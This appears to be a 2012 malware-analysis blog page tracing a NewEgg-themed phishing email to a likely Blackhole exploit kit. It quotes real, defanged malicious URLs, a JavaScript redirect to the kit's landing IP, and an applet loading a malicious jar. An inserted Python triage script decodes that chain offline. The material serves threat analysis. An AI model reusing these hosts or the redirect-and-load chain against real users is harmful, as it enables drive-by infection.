If you haven't heard yet, there is a phishing email going around masquerading as a NewEgg payment verification.
(Sanitized image from Outlook with no images loaded)
Not surprisingly, the links all point to an initial URL: hxxp://ftp[dot]qsari[dot]org/YtWvZiiG/index.html, which contains references to 3 JavaScript files (I assume for redundancy; URLs altered to prevent clicking):
hxxp://congress-assistants[dot]fi/idm2TZP1/js.js
hxxp://mobileproductivemoneymaking[dot]com/oExXoVCh/js.js
hxxp://primasaleorganik[dot]com/3N6zKxSS/js.js
All of these files contain JavaScript pointing to the same location (URLs altered to prevent clicking):
document.location='hxxp://216[dot]224[dot]182[dot]94/showthread.php?t=d7ad916d1c0396ff';
This points to the final page, which contains a Java applet. The archive path is obfuscated, partially with hex character entities; decoded, the applet loads:
hxxp://216[dot]224[dot]182[dot]94/data/Klot.jar?a=1
It passes a "code" parameter, code="ta.tc". The archive contains 3 files:
ta/ta.class
ta/tb.class
ta/tc.class
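The redirect chain above, as a small triage script added here (it is not the author's code): it pulls the script sources out of the first-stage page, extracts the document.location target from each js.js, decodes the hex and decimal character entities hiding the applet's archive path and entry class, maps the "code" attribute to the jar entry the JVM will load, and defangs the results for a report. The HTML and JavaScript bodies are constructed stand-ins built from the URLs listed in this post; the real pages are not reproduced, and the fetch is an in-memory dictionary so nothing is downloaded.

```python
import html
import re

# Constructed stand-ins for the captured pages (not the real files), using the
# hosts and paths named in this post.
INDEX_HTML = """<html><head>
<script type="text/javascript" src="http://congress-assistants.fi/idm2TZP1/js.js"></script>
<script type="text/javascript" src="http://mobileproductivemoneymaking.com/oExXoVCh/js.js"></script>
<script type="text/javascript" src="http://primasaleorganik.com/3N6zKxSS/js.js"></script>
</head><body></body></html>"""

# Body served for each js.js: a one-line redirect to the exploit-kit landing page.
JS_JS = "document.location='http://216.224.182.94/showthread.php?t=d7ad916d1c0396ff';"

# Landing page with the archive path and entry class hidden behind hex (&#x..;)
# and decimal (&#..;) character entities. Constructed markup, not the real page.
LANDING_HTML = """<html><body>
<applet archive="http://216.224.182.94/&#x64;&#x61;&#x74;&#x61;&#x2f;&#75;&#x6c;&#x6f;&#x74;&#x2e;&#x6a;&#x61;&#x72;?a=1" code="&#x74;&#x61;&#x2e;&#x74;&#x63;" width="1" height="1">
<param name="code" value="ta.tc"/>
</applet></body></html>"""

# Offline stand-in for an HTTP fetch: URL -> body.
CORPUS = {
    "http://congress-assistants.fi/idm2TZP1/js.js": JS_JS,
    "http://mobileproductivemoneymaking.com/oExXoVCh/js.js": JS_JS,
    "http://primasaleorganik.com/3N6zKxSS/js.js": JS_JS,
}

SCRIPT_SRC_RE = re.compile(r'<script[^>]*\ssrc\s*=\s*["\']([^"\']+)["\']', re.I)
REDIRECT_RE = re.compile(
    r'(?:document|window|top|self)?\.?location(?:\.href)?\s*=\s*["\']([^"\']+)["\']', re.I)
APPLET_RE = re.compile(r'<applet\b([^>]*)>(.*?)</applet>', re.I | re.S)
PARAM_RE = re.compile(r'<param\b([^>]*)/?>', re.I)
ATTR_RE = re.compile(r'([\w-]+)\s*=\s*["\']([^"\']*)["\']')


def _attrs(tag_body):
    """Attribute dict for one tag, entities decoded per value. Decoding values
    individually (not the whole page) keeps an attacker's &lt;script&gt; from
    turning into real markup before the regexes see it."""
    return {k.lower(): html.unescape(v) for k, v in ATTR_RE.findall(tag_body)}


def script_sources(page):
    """External script URLs referenced by the first-stage page, in order."""
    return [html.unescape(u) for u in SCRIPT_SRC_RE.findall(page)]


def redirect_targets(js):
    """URLs assigned to location / document.location / window.location.href."""
    return [html.unescape(u) for u in REDIRECT_RE.findall(js)]


def applet_info(page):
    """Archive URL, entry class and <param>s of the first <applet>, entity-decoded."""
    m = APPLET_RE.search(page)
    if not m:
        return None
    attrs = _attrs(m.group(1))
    params = {}
    for body in PARAM_RE.findall(m.group(2)):
        p = _attrs(body)
        if "name" in p:
            params[p["name"]] = p.get("value", "")
    return {"archive": attrs.get("archive"), "code": attrs.get("code"), "params": params}


def follow_chain(index_html, fetch):
    """Walk index -> js.js -> redirect target; fetch is a url -> body callable."""
    hops = []
    for src in script_sources(index_html):
        body = fetch(src)
        if body is None:
            continue
        for target in redirect_targets(body):
            hops.append((src, target))
    return hops


def entry_class_path(code):
    """Jar entry the JVM loads for an applet code="pkg.Cls" attribute."""
    return code.replace(".", "/") + ".class"


def defang(url):
    """hxxp:// plus [dot] in the host part, the convention used in this post."""
    scheme, sep, rest = url.partition("://")
    if not sep:
        return url.replace(".", "[dot]")
    host, slash, path = rest.partition("/")
    return scheme.replace("http", "hxxp") + "://" + host.replace(".", "[dot]") + slash + path


if __name__ == "__main__":
    for src, target in follow_chain(INDEX_HTML, CORPUS.get):
        print(defang(src), "->", defang(target))
    info = applet_info(LANDING_HTML)
    print(defang(info["archive"]), info["code"], entry_class_path(info["code"]), info["params"])
```

Swapping CORPUS.get for a real fetcher in an isolated sandbox turns this into a chain-walker for the next campaign; the entity decoding is what lets a string match on "Klot.jar" or "showthread.php" fire even when the landing page spells the path out as &#x..; entities.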
At this point, we all know this is surely a Java exploit... Blackhole exploit kit comes to mind. Here are the VirusTotal results (you will see my initial analysis there, which is contained in this blog post):
https://www.virustotal.com/file/49fd75119fdb50902e7e265b0243cc793eb4d9bd4675271e1853a04e194a3e18/analysis/
As any good malware used in a phishing campaign should, this file receives a not-so-shocking 0/42. I wonder how many users clicked this? Luckily, the individuals who received this did not do so. Instead, they forwarded it to me for advice. Whew!
Coming up, I'll attempt to dig into analyzing the decompiled Java code...
Monday, April 9, 2012
Tuesday, March 20, 2012
Greetings to sympt0m
My friend David Keaton, aka sympt0m, has created a blog. I'm excited to see what he has to say. I'm ready to absorb that reverse engineering knowledge you have, buddy. Let it fly!
Friday, March 16, 2012
Blackhole Exploit Kit (Part 1)
If you are involved in any type of incident response for your organization, you've most likely heard about the Blackhole Exploit Kit. This threat, seemingly of Eastern European origin, has been making its rounds over the last year. Recently, I have been observing an increase in activity related to the Blackhole exploit kit. So far, the delivery methods that I have observed involve dropping a .jar file and .class files on the target system. Today, I observed something a bit different.
Take a look at the following analysis report from VirusTotal:
https://www.virustotal.com/file/19d0218d21f8f3d30bbf0dbd6a487d8ae4d86b696c678c33eb5b5042ef6f3e3e/analysis/
The file scores a 0/42. This is not the first time, nor will it be the last time that this situation occurs. Perhaps this is the newest variant and I happened to catch it during an initial release. One thing that does concern me is that this threat appears to be different from the previous version I observed just a week ago. I'd be interested to hear observations from anyone else who is actively tracking this threat.
Emerging threats like these are the reason why human involvement is still key in incident response and analysis of suspicious activity. The BHEK seems to be implementing a high amount of obfuscation in order to avoid signature-based detection. While this is neither surprising nor new, it does seem to show that these guys are more than one step ahead of the current defense systems we all employ. I am hoping to test out the dynamic aspects later today to see what is revealed.
More to come...